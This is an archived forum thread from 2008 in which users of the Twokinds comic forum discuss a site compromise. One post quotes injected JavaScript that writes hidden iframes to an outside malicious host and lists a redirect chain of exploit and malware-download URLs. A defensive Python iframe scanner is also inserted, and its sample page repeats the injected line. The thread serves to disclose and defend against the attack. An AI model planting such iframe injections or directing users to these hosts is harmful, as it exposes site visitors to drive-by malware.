Twokinds ARCHIVE Forums

This forum is for the preservation of old threads from before the forum pruning.
All times are UTC - 5 hours

 Post subject: Has the forum been compromised?
PostPosted: Sun Oct 12, 2008 12:13 pm 
Citizen

Joined: Wed Jul 30, 2008 5:13 am
Posts: 96
Seems to be... Currently, there seems to be code on each of the pages. (To see it, view the page source that you're on (seemingly regardless of the style you're using), and look for the words plgbn15(p) and flbn15(p)). The first block of code, executed and evaluated, does this:
Code:
window.status='Done';document.write('<iframe name=b21a src="http://add-content-block.net/t/?'+Math.round(Math.random()*14850)+'b21a'+'" width=135 height=110 style="display:none"></iframe>')
while the second does this:
Code:
window.status='Done';document.write('<iframe name=7346 src="http://add-content-block.net/t/?'+Math.round(Math.random()*31108)+'7346'+'" width=404 height=77 style="display:none"></iframe>')


Both of these attacks are known as malicious iframe attacks (read more here, here and here). For more info on iframes, check wikipedia. In each case, the iframes trigger a series of redirections, and I managed to partially trace them through a bunch of websites. (Partial because my modem decided to crash midway.)

The websites are listed in the order that they were requested by the malicious iframe:
add-content-block.net/t/?13559b21a (The last part is always somewhat random and will vary.)
analystic.org/in.cgi?16&e1d9f8 (Ditto, as far as I can tell.)
analystic.org/potok.php
analystic.org/in.cgi?8
xdrv.info/uno/count.php?o=2
busyhere.ru/in.cgi?pipka2
xdrv.info/uno/count.php?o=7
xdrv.info/uno/exploits/x18.php?o=2&t=1223824153&i=3707701169 -- this opened a pdf
66.212.19.146/g/index.php -- autorun a file
66.212.19.146/g/pdf.php -- downloads a file
pornarrows.com/none

In each case, the loading is fairly undetectable - the most you'll see is "Loading analystic.org/potok.php...", and briefly at that. As far as I can tell, this takes advantage of a vulnerability in Adobe Acrobat to do something. I'm not sure what, running it in a sandbox caused Acrobat to crash badly.

At this point, I can't do anything, beyond trying to trace the entire route it takes, which I can't right now for various reasons. However, I believe that using Firefox with NoScript (not just Firefox alone) should prevent this attack from succeeding. One thing that you can check is C:\Documents and Settings\All Users\Start Menu\Programs\Startup and see if there's a file called browsers.exe? If there is, delete it. That's the only reference I came across that had a reference to a specific file.

I'll continue this tomorrow (in about 7 hours or so if you're counting), but in the meantime KitWiz and Robbiethe1st, among others, will probably have some insights into this whole thing. Also, sorry to Yash for starting on this topic in the Ranting Board and derailing one of the topics.

I am sincerely hoping that someone will find a way to prove me wrong, but to me it looks as if the 2kinds forum has been a victim of a malicious attack, whether automated or targeted at 2kinds.
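One way to check a saved copy of a page for the pattern described above, added here as an example and not code from the thread or the forum software: a Python scanner that parses page source, flags iframes hidden by inline style (or sized to 1px) and iframes emitted at load time through document.write, and lists every third-party host the page loads scripts or frames from, roughly the per-site list NoScript shows. The sample page and the host name hidden-host.example are constructed for the example; the add-content-block.net script line is the one quoted in the post.

```python
"""Scan page source for hidden or script-written iframes (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# An <iframe> emitted from inside a <script> via document.write(...).
DOCWRITE_IFRAME = re.compile(r"document\.write\(\s*['\"]<iframe", re.IGNORECASE)
# Host part of an src="http://host/..." fragment embedded in script text.
SRC_HOST = re.compile(r"""src=\\?["']?https?://([A-Za-z0-9.-]+)""", re.IGNORECASE)
# Inline styles that keep a frame off-screen while it still loads.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)


class IframeScanner(HTMLParser):
    """Collects suspicious frames and the set of hosts the page loads code from."""

    def __init__(self):
        super().__init__()
        self.findings = []      # (kind, detail) tuples
        self.hosts = set()      # hosts seen in <script src> / <iframe src>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            self._note_host(a.get("src"))
        elif tag == "iframe":
            src = a.get("src") or ""
            self._note_host(src)
            if HIDDEN_STYLE.search(a.get("style") or "") or self._is_tiny(a):
                self.findings.append(("hidden-iframe", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands the <script> body to handle_data as raw text.
        if self._in_script and DOCWRITE_IFRAME.search(data):
            hosts = [h.lower() for h in SRC_HOST.findall(data)]
            self.hosts.update(hosts)
            for host in hosts or ["(host not found in script text)"]:
                self.findings.append(("script-written-iframe", host))

    @staticmethod
    def _is_tiny(a):
        """True when both width and height are given and at most 1px."""
        try:
            return int(a.get("width", "")) <= 1 and int(a.get("height", "")) <= 1
        except (ValueError, TypeError):
            return False

    def _note_host(self, src):
        host = urlsplit(src).hostname if src else None
        if host:
            self.hosts.add(host.lower())


def scan_page(html, site_host):
    """Return the findings plus every host that is not the site's own."""
    scanner = IframeScanner()
    scanner.feed(html)
    scanner.close()
    own = site_host.lower()
    external = sorted(h for h in scanner.hosts
                      if h != own and not h.endswith("." + own))
    return {"findings": scanner.findings, "external_hosts": external}


# Constructed sample page: the injected script from the post, a harmless
# same-site frame, and a hidden frame to a made-up third-party host.
SAMPLE_PAGE = """<html><head>
<script src="http://2kinds.com/forum/forum_fn.js"></script>
<script>window.status='Done';document.write('<iframe name=b21a src="http://add-content-block.net/t/?'+Math.round(Math.random()*14850)+'b21a'+'" width=135 height=110 style="display:none"></iframe>')</script>
<!-- twokindscomic.com -->
</head><body>
<iframe src="http://2kinds.com/forum/poll.php" width="300" height="200"></iframe>
<iframe src="http://hidden-host.example/x.php" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>"""

if __name__ == "__main__":
    result = scan_page(SAMPLE_PAGE, "2kinds.com")
    for kind, detail in result["findings"]:
        print(f"{kind}: {detail}")
    print("third-party hosts:", ", ".join(result["external_hosts"]))
```

Run it against `view-source` output saved to a file and compare the third-party host list with what the site is supposed to load; any host you do not recognise, and any frame the scanner reports as hidden or script-written, is worth checking before allowing it in NoScript.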


PostPosted: Sun Oct 12, 2008 12:29 pm
Templar Inner Circle

Joined: Wed Mar 09, 2005 1:55 am
Posts: 2885
Location: Somewhere in my pants.
Chrome gives its anti-malware warning on the front page as well. =/


PostPosted: Sun Oct 12, 2008 12:51 pm
Templar

Joined: Wed Aug 13, 2008 6:08 pm
Posts: 397
Location: Haha, I see you.....
It was the people from phoenix req with their vote bots and trying to kill our computers >.<


PostPosted: Sun Oct 12, 2008 12:56 pm
The Inkwell Coyote

Joined: Wed Aug 09, 2006 4:28 pm
Posts: 7495
Location: 44°39'54"N 90°10'33"W
It may be because I'm slogging through the middle, worst part of a bad cold but I really don't understand anything that happened seven inches above this post...

Forum... broke?


PostPosted: Sun Oct 12, 2008 1:06 pm
Resident Rule Nazi

Joined: Tue Feb 15, 2005 3:52 pm
Posts: 1122
I am personally bringing this matter up to Tom. This could possibly be a serious security violation that affects almost every user on the Twokinds forum. Hopefully, he will have the time to respond.

*EDIT* PM sent. If he responds to me directly, (and allows me to post his message) I will post his response in this thread.


PostPosted: Sun Oct 12, 2008 1:13 pm
Templar

Joined: Wed Aug 13, 2008 6:08 pm
Posts: 397
Location: Haha, I see you.....
Wonder if that's what is making my computer load slowly...


PostPosted: Sun Oct 12, 2008 1:33 pm
Templar Master

Joined: Thu Jul 17, 2008 10:09 am
Posts: 443
Location: My own little fortress...
But allowing "2kinds.com" is still okay with NoScript? Just checking..

NoScript notifies about said "add-content-block.net", but ALSO about "bibilon.net" and "recentl.cn". Are they similar to this or should they be there?

@Fast and others who didn't read/understand, Forum didn't break. Its users are under computer security threat. NoScript for Firefox ought to keep you safe.


PostPosted: Sun Oct 12, 2008 3:43 pm
Citizen

Joined: Tue Sep 16, 2008 10:27 pm
Posts: 99
Sorry, I've been a tad bit busy for the past few days but I'll check Tom's php coding directly....


PostPosted: Sun Oct 12, 2008 3:46 pm
Templar Inner Circle

Joined: Tue Jul 15, 2008 1:37 am
Posts: 3264
Location: Washington
Jeez, Kit, don't overload yourself...


PostPosted: Sun Oct 12, 2008 5:13 pm
Grand Templar

Joined: Wed Aug 29, 2007 3:24 pm
Posts: 1545
Location: Carmina Gadelica
*Also apologizes for aiding and abetting the aforementioned thread derailment*
<<;

This NoScript for Firefox...it is an add-on, I take it? Would picking it up now be a case of too little, too late?
o.o


PostPosted: Sun Oct 12, 2008 5:14 pm
Citizen

Joined: Wed Jul 30, 2008 5:13 am
Posts: 96
Demus wrote:
But allowing "2kinds.com" is still okay with NoScript? Just checking..

NoScript notifies about said "add-content-block.net", but ALSO about "bibilon.net" and "recentl.cn". Are they similar to this or should they be there?

@Fast and others who didn't read/understand, Forum didn't break. Its users are under computer security threat. NoScript for Firefox ought to keep you safe.

Hmm... interesting... My copy of NoScript is only warning about add-content-block.net. Shall keep an eye out for those sites later.

Anyway, yes, 2kinds.com is technically safe to allow - the iframe will load, but NoScript prevents it from doing anything, and the other features of the forum that use JavaScript will remain unaffected.

The strange thing about this is that immediately after the malicious script, this comment appears:
Code:
<!-- twokindscomic.com -->

I checked twokindscomic.com, and there's no immediately obvious link (as in hyperlink) to 2kinds.com, which makes me think that the server 2kinds.com is hosted on itself has been compromised. If 2kinds was targeted, I don't think someone would put in the wrong address.

Tuna wrote:
This NoScript for Firefox...it is an add-on, I take it? Would picking it up now be a case of too little, too late?
o.o


Not necessarily. In this specific case, yes, it would be too late, but I'd say get it anyway, because it would prevent attacks like this from happening to you in the future. If the forum's server is compromised, the forum itself could be reinfected once cleaned, or even if you go to another page that's infected, you would be silently attacked again. I think it's better to reduce the potential of attacks. =)

I'm going to continue working on this today at school (which I'm leaving for in about 10 minutes) and post anything new later. Have a good day/night to you all. (And get better soon Fast!)


Post subject: Re: Has the forum been compromised?
PostPosted: Sun Oct 12, 2008 8:55 pm
Templar Inner Circle

Joined: Sun Mar 30, 2008 10:05 pm
Posts: 2906
Location: Five miles into nothing, sitting in a Dennies
Something happened....

The forum was down for awhile, now it's back.. er...

Is this phpbb 3?


Post subject: Re: Has the forum been compromised?
PostPosted: Sun Oct 12, 2008 9:00 pm
The Inkwell Coyote

Joined: Wed Aug 09, 2006 4:28 pm
Posts: 7495
Location: 44°39'54"N 90°10'33"W
I'm not sure. The format is different, though I'm not sure if I like the new layout. Very grey, drab.

Edit: Ugh, my avatar just got crushed, too.


Post subject: Re: Has the forum been compromised?
PostPosted: Sun Oct 12, 2008 9:05 pm
Templar Inner Circle

Joined: Sun Mar 30, 2008 10:05 pm
Posts: 2906
Location: Five miles into nothing, sitting in a Dennies
This reminds me of others I've seen, especially with the "User Control Panel" instead of the profile. Methinks it is 3.

And same with mine, though, to a lesser degree.


Post subject: Re: Has the forum been compromised?
PostPosted: Sun Oct 12, 2008 9:20 pm
Citizen

Joined: Tue Dec 25, 2007 11:05 pm
Posts: 75
Location: Ottawa, Canada
Should I or someone else start a new thread about the new board?

I'm now using the new default "prosilver" theme. It's... very blue.
... but avatars on the right don't seem to fit TwoKinds Forum very well...

